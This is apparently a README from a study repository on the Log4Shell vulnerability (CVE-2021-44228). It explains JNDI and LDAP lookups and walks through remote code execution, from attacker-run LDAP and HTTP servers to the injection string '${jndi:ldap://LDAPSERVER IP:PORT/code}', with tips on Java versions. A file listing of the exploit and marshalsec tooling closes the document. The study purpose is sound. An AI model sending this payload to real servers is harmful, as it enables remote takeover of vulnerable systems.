CVE-2021-44228 vulnerability study# CVE-2021-44228 Analysis
## How does it work?
Below is a detailed process of a remote injection case by exploiting log4shell vulnerability.
First, there are 3 part we need to know:
1. Log4j2 allows for the logging of data using a feature called **message lookup substitution**, where log messages can include data dynamically pulled from various sources. (It supports JNDI Lookup)
2. **JNDI Lookup**: Allows data to be fetched via the Java Naming and Directory Interface (JNDI) API, which can interact with different directory services<p align="center" ><img src="image/JNDI.jpg"></p>
3. **LDAP (Lightweight Directory Access Protocol)**: Used primarily for accessing and managing directory information services over a network.
---
Here is a simple example of Remote Code Execution:
<p align="center" ><img src="image/how.jpg" title="" alt="" data-align="center"></p>
1. Hacker set up both LDAP server (accessed by LDAP protocol, keeping a Java malicious code reference) and HTTP server (the place store malicious code)
1. Set up a HTTP Server in the directory that contain compiled malicious code:<p align="center" ><img src="image/http.jpg" title="" alt="" data-align="center"></p>
2. Set up a LDAP Server that store reference:<p align="center" ><img src="image/ldap.jpg" title="" alt="ldap" data-align="center"></p>
2. Hacker sends malicious Input (${jndi:ldap://LDAPSERVER IP:PORT/code}) to software system that have installed log4j2<p align="center" ><img src="image/software%20server.jpg" title="" alt="" data-align="center"></p>
3. Log4j2 using the lookup feature to send request to LDAP server
4. LDAP server redirect requests to HTTP servers via Java code references stored in LDAP servers
5. HTTP server sends back malicious code to software system, and then software system executes the malicious code.
Malicious Code:<p align="center" ><img src="image/malicious.jpg" title="" alt="" data-align="center"></p>
Execute malicious code succeeded:
<p align="center" ><img src="image/result.jpg" title="" alt="" data-align="center"></p>
---
**IMPORTANT**:
1. It is not we can only use LDAP server to do remote code execution, we can also use other methods (such as RMI) as long as the log4j2 successfully do the message lookup substitution and execute malicious code
2. Different versions of Java can make the exploit process different (here we are using java 1.8u112).
3. It is recommended to use the same version of Java in the malicious code as the software (servers using log4j2) or at most not higher than the Java version of the software.<p align="center" ><img src="image/version.jpg" title="" alt="" data-align="center"></p>
4. The lookup code in Log4j2:<p align="center" ><img src="image/lookup.jpg" title="" alt="" data-align="center"></p>
[4.0K] /data/pocs/f209dcc5e5206025f2505d7ec2a3416adac74114
├── [4.0K] http
│ ├── [ 749] exp.class
│ └── [ 288] exp.java
├── [4.0K] image
│ ├── [ 24K] how.jpg
│ ├── [ 14K] http.jpg
│ ├── [ 25K] JNDI.jpg
│ ├── [ 89K] ldap.jpg
│ ├── [106K] lookup.jpg
│ ├── [ 40K] malicious.jpg
│ ├── [ 84K] result.jpg
│ ├── [ 45K] software server.jpg
│ └── [ 24K] version.jpg
├── [1.0K] LICENSE
├── [4.0K] marshalsec
│ ├── [1.0K] LICENSE.txt
│ ├── [ 195] marshalsec.iml
│ ├── [404K] marshalsec.pdf
│ ├── [7.2K] pom.xml
│ ├── [5.5K] README.md
│ ├── [4.0K] src
│ │ ├── [4.0K] main
│ │ │ └── [4.0K] java
│ │ │ └── [4.0K] marshalsec
│ │ │ ├── [2.0K] BlazeDSAMF0.java
│ │ │ ├── [2.9K] BlazeDSAMF3AM.java
│ │ │ ├── [2.0K] BlazeDSAMF3.java
│ │ │ ├── [3.0K] BlazeDSAMFX.java
│ │ │ ├── [6.1K] BlazeDSBase.java
│ │ │ ├── [1.2K] BlazeDSExternalizableBase.java
│ │ │ ├── [2.0K] Burlap.java
│ │ │ ├── [3.8K] Castor.java
│ │ │ ├── [1.1K] EscapeType.java
│ │ │ ├── [4.0K] gadgets
│ │ │ │ ├── [1.4K] Args.java
│ │ │ │ ├── [1.7K] BindingEnumeration.java
│ │ │ │ ├── [1.8K] C3P0RefDataSource.java
│ │ │ │ ├── [3.1K] C3P0WrapperConnPool.java
│ │ │ │ ├── [1.4K] ClassFiles.java
│ │ │ │ ├── [1.9K] CommonsBeanutils.java
│ │ │ │ ├── [3.0K] CommonsConfiguration.java
│ │ │ │ ├── [1.1K] Gadget.java
│ │ │ │ ├── [2.3K] GadgetType.java
│ │ │ │ ├── [2.0K] Groovy.java
│ │ │ │ ├── [2.9K] ImageIO.java
│ │ │ │ ├── [1.5K] JdbcRowSet.java
│ │ │ │ ├── [ 14K] JDKUtil.java
│ │ │ │ ├── [1.6K] LazySearchEnumeration.java
│ │ │ │ ├── [3.8K] MockProxies.java
│ │ │ │ ├── [1.3K] Primary.java
│ │ │ │ ├── [2.5K] Resin.java
│ │ │ │ ├── [ 351] ResourceGadget.java
│ │ │ │ ├── [2.0K] Rome.java
│ │ │ │ ├── [1.5K] ScriptEngine.java
│ │ │ │ ├── [1.7K] ServiceLoader.java
│ │ │ │ ├── [1.6K] SpringAbstractBeanFactoryPointcutAdvisor.java
│ │ │ │ ├── [1.7K] SpringPartiallyComparableAdvisorHolder.java
│ │ │ │ ├── [1.9K] SpringPropertyPathFactory.java
│ │ │ │ ├── [5.8K] SpringUtil.java
│ │ │ │ ├── [1.3K] Templates.java
│ │ │ │ ├── [4.3K] TemplatesUtil.java
│ │ │ │ ├── [3.5K] ToStringUtil.java
│ │ │ │ ├── [1.8K] UnicastRefGadget.java
│ │ │ │ ├── [1.7K] UnicastRemoteObjectGadget.java
│ │ │ │ └── [2.0K] XBean.java
│ │ │ ├── [2.0K] Hessian2.java
│ │ │ ├── [4.0K] HessianBase.java
│ │ │ ├── [2.0K] Hessian.java
│ │ │ ├── [9.7K] Jackson.java
│ │ │ ├── [2.6K] Java.java
│ │ │ ├── [4.0K] jndi
│ │ │ │ ├── [4.9K] LDAPRefServer.java
│ │ │ │ └── [ 13K] RMIRefServer.java
│ │ │ ├── [4.6K] JsonIO.java
│ │ │ ├── [2.2K] JYAML.java
│ │ │ ├── [2.8K] KryoAltStrategy.java
│ │ │ ├── [2.5K] Kryo.java
│ │ │ ├── [ 11K] MarshallerBase.java
│ │ │ ├── [1.9K] Red5AMF0.java
│ │ │ ├── [1.9K] Red5AMF3.java
│ │ │ ├── [5.5K] Red5AMFBase.java
│ │ │ ├── [3.6K] SideEffectSecurityManager.java
│ │ │ ├── [7.5K] SnakeYAML.java
│ │ │ ├── [2.8K] TestingSecurityManager.java
│ │ │ ├── [4.0K] util
│ │ │ │ └── [2.5K] Reflections.java
│ │ │ ├── [2.0K] UtilFactory.java
│ │ │ ├── [3.0K] XStream.java
│ │ │ ├── [6.6K] YAMLBase.java
│ │ │ └── [2.4K] YAMLBeans.java
│ │ └── [4.0K] test
│ │ └── [4.0K] java
│ │ └── [3.6K] GadgetsTest.java
│ └── [2.6K] untitled4-1.0-SNAPSHOT.jar
├── [2.7K] README.md
└── [4.0K] target server
└── [ 616] HelloLog.java
13 directories, 84 files